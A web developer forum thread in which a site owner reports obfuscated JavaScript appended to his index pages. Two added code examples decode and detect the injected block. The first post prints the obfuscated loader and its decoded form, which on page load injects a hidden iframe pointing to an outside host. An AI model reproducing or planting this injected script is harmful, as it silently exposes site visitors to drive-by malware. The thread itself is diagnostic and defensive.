www.webdeveloper.com

Thread: I think my site was hacked, javascript added

  1. #1
    Join Date
    Mar 2006
    Posts
    51

    I think my site was hacked, javascript added

    Hi all, I recently found the following code added on to the end of my index page:
    Code:
    <!--<S>--><script>
    try {
    	var oOX='ppupHupqupaupbupyupJupxup7upCupeupiupcupzupAupsuprupKupUup5upkupfupLupIupPup4upBupNupdupjupXuptup9up8up3upYupRupFupwupoupGuplupMupSup6upZupmupWupgupDupnuphupTupVuHpuHHuHquHauHbuHy';
    	var tSF='u', AWL=Array(56626^56735,226,KG('242'),KG('227'),248,KG('225'),KG('229'),27941^28052,253,20712^20504,255,KG('246'),KG('228'),KG('244'),KG('172'),179,KG('251'),231,KG('175'),156,KG('155'),KG('245'),162,170,160,KG('247'),KG('185'),KG('254'),KG('252'),191,KG('250'),KG('233'),45475^45437,186,KG('184'),188,60713^60867,KG('249'),7437^7590,190,7474^7617,58640^58820,KG('208'),KG('189'),61411^61232,161,30649^30559,232,58259^58177,47178^47236,236,KG('213'),KG('197'),KG('167'),KG('187'),KG('163'),8550^8643,KG('214'),220,KG('194'));
    	var ge;
    	var Xbo,DZ;
    	var fc='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';
    	var RU='';
    	function KG(xt){
    		return parseInt(xt)
    	}
    	oOX=oOX.split(tSF);
    	for(ge=0;ge<fc.length;ge+=2){
    		DZ=fc.substr(ge,2);
    		for(Xbo=0;Xbo<oOX.length;Xbo++){
    			if(oOX[Xbo]==DZ) break;
    		} 
    		RU+=String.fromCharCode(AWL[Xbo]^145);
    	}
    	document.write(RU);
    }
    catch(e){
    	
    }</script><!--</S>-->
    Based on the fromCharCode and document.write statements, I knew something fishy was up, so I modified it a bit to see the output and I get the following code:
    Code:
    <script language="javascript">
    var cn = "undcr3";
    var cv = "1";
    if(document.cookie.indexOf(cn+"="+cv) == -1)
    {
    var url = "http://deutchbank.net/mpack/index.php";
    var o = document.createElement("iframe");o.setAttribute("src", url);
    o.frameBorder=0; o.width=1; o.height=1; o.style.display="none"; 
    try { document.body.appendChild(o); rsys_sc(cn,cv);}
    catch(e){
    document.write("<html><body></body></html>");
    document.body.appendChild(o); rsys_sc(cn,cv);
    }}
    function rsys_sc(cn,cv){ var t= new Date(); var e= new Date(); e.setTime(t.getTime()+3600000*24); document.cookie = cn+"="+escape(cv)+";expires="+e.toGMTString(); }
    </script>
    Does anyone have any clue what this is and how it may have got there?
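
Added example (not part of the original post): the lookup-table and XOR loop in the injected script can be reproduced statically, so the output is recovered without running the script or calling document.write. The function names are hypothetical; the token list and table are the first seven entries from the post, and the payload string is constructed for the example.

```javascript
'use strict';

// Turn the table source into numbers. Handles the three entry forms seen in
// the post: 226, 56626^56735, and KG('242') (the wrapper name varies per copy).
function parseTable(src) {
  return src.split(',').map((item) => {
    const m = item.trim().match(/^(?:\w+\(\s*'(\d+)'\s*\)|(\d+)\s*\^\s*(\d+)|(\d+))$/);
    if (!m) throw new Error(`unsupported table entry: ${item}`);
    if (m[1] !== undefined) return parseInt(m[1], 10);
    if (m[2] !== undefined) return Number(m[2]) ^ Number(m[3]);
    return Number(m[4]);
  });
}

// tokens = oOX, delim = tSF, table = AWL, key = 145, payload = fc in the post.
function decodeInjected({ tokens, delim, table, key, payload, width = 2 }) {
  const index = new Map();
  tokens.split(delim).forEach((tok, i) => {
    if (!index.has(tok)) index.set(tok, i); // first match wins, as in the loop
  });
  let out = '';
  for (let i = 0; i < payload.length; i += width) {
    const tok = payload.substr(i, width);
    const pos = index.get(tok);
    if (pos === undefined || pos >= table.length) {
      throw new Error(`unknown token ${JSON.stringify(tok)} at offset ${i}`);
    }
    out += String.fromCharCode(table[pos] ^ key);
  }
  return out; // plain text for inspection; never written into a document
}

// First seven tokens and table entries from the post; payload is constructed.
const SAMPLE = {
  tokens: 'ppupHupqupaupbupyupJ',
  delim: 'u',
  table: parseTable("56626^56735,226,KG('242'),KG('227'),248,KG('225'),KG('229')"),
  key: 145,
  payload: 'pppHpqpapbpypJ',
};

console.log(JSON.stringify(decodeInjected(SAMPLE)));
```
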

  2. #2
    Join Date
    Nov 2003
    Location
    Worthington, OH, USA
    Posts
    3,634
    Do you use a host that places advertising on your pages?
    54 68 65 42 65 61 72 4D 61 79

  3. #3
    Join Date
    Oct 2006
    Location
    Ontario Canada
    Posts
    1,160
    did you recently add a banner or any other form of advertisement?

    sometimes their code will add JS to your page.

  4. #4
    Join Date
    Mar 2006
    Posts
    51
    Thanks for the replies. No, I use servage.net, and it's paid hosting that doesn't show ads, and only Google AdSense banners are shown (which was scripting that I specifically added). I noticed the code was used across all other sites on my account (with different variable names, etc., but output was the same). It was even on one site that is completely ad free, so there was no reason for it to show up there, at least not by my doing. I have a ticket open with the hosting service to see what they say about it, and I have already changed all of my passwords (ftp and web interface login).

  5. #5
    Join Date
    Oct 2006
    Location
    Ontario Canada
    Posts
    1,160
    sometimes a host will add scripts to your page automatically so they can track visitors, stats etc..

  6. #6
    Join Date
    Mar 2006
    Posts
    51
    Hmm, I hope that is all that has happened. Though I found it by performing xhtml validation and it failed for the first time in a year. Maybe it's something new, but regardless, they should notify me if they are going to mess up my validated code. I'll wait and see what they say. Thanks for the reply again.

  7. #7
    Join Date
    Oct 2006
    Location
    Ontario Canada
    Posts
    1,160
    try uploading a new page (test.htm) and then view source..
    see if the JS gets added to the page.

    Drew

  8. #8
    Join Date
    Mar 2006
    Posts
    51
    Done, the code was not added. I should note that it was only added to my index.php, or main.php files. Only on the main page, whatever that page was (not in the header or footer files).

  9. #9
    Join Date
    Jan 2008
    Location
    Florida
    Posts
    1,227
    I came across something similar years ago when I was using a control panel to manage my sites. Maybe Ensim, I don't remember.. but I finally discovered that the control panel was adding the code. I got rid of it.

  10. #10
    Join Date
    Mar 2006
    Posts
    51
    OK, well I actually use Dreamweaver and ftp usually. But, if it is something like that, I think the hosting company would know about it and they will tell me. I hope you all are right. Otherwise, 4 money making sites were compromised in a manner that I don't even know about.

  11. #11
    Join Date
    Jan 2008
    Location
    Florida
    Posts
    1,227
    Also, for the heck of it... does this code exist in the file itself or only when you view source? I know that sounds weird but... can you download the file from ftp and open the raw file?

  12. #12
    Join Date
    Mar 2006
    Posts
    51
    It is in the file itself, in the .php. I went through and deleted it all, and now it is gone. And it doesn't sound weird. I know exactly what you're asking.
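
Added example (not part of the thread): a check for the appended block described above, applied to page source held as a string. It matches the `<!--<S>-->` / `<!--</S>-->` marker comments from the first post and falls back to the structure of the script (String.fromCharCode, document.write and a numeric XOR) because the variable names differed between sites. Function names and the sample pages are constructed for the example.

```javascript
'use strict';

// Marker comments that wrapped the injected block in the first post.
const BLOCK_RE = /<!--<S>-->\s*<script\b[^>]*>([\s\S]*?)<\/script>\s*<!--<\/S>-->/gi;
// Any inline script, for copies whose marker comments were changed or dropped.
const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;

// Structural traits of the decoder stub; independent of variable names.
function looksObfuscated(js) {
  return /String\.fromCharCode\s*\(/.test(js) &&
         /document\.write\s*\(/.test(js) &&
         /\^\s*\d+/.test(js);
}

// Returns [{start, end, reason}] for every suspicious block in the page text.
function findInjected(html) {
  const hits = [];
  for (const m of html.matchAll(BLOCK_RE)) {
    hits.push({ start: m.index, end: m.index + m[0].length, reason: 'marker' });
  }
  for (const m of html.matchAll(SCRIPT_RE)) {
    const start = m.index, end = m.index + m[0].length;
    const covered = hits.some((h) => start >= h.start && end <= h.end);
    if (!covered && looksObfuscated(m[1])) hits.push({ start, end, reason: 'heuristic' });
  }
  return hits.sort((a, b) => a.start - b.start);
}

// Returns the page text with every flagged block cut out.
function stripInjected(html) {
  let out = '', pos = 0;
  for (const h of findInjected(html)) {
    out += html.slice(pos, h.start);
    pos = h.end;
  }
  return out + html.slice(pos);
}

// Constructed samples: a clean page and an inert stand-in for the appended block.
const CLEAN = '<html><body><p>Hello</p><script>var n = 1 + 1;</script></body></html>';
const INJECTED = "<!--<S>--><script>try{var r='';r+=String.fromCharCode(233^145);" +
                 "document.write(r);}catch(e){}</script><!--</S>-->";

console.log(findInjected(CLEAN + INJECTED));
```

Run it over every file on the account rather than only index.php or main.php, and keep the flagged copies for the hosting ticket before cleaning; removing the block does not show how it was written to the files.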
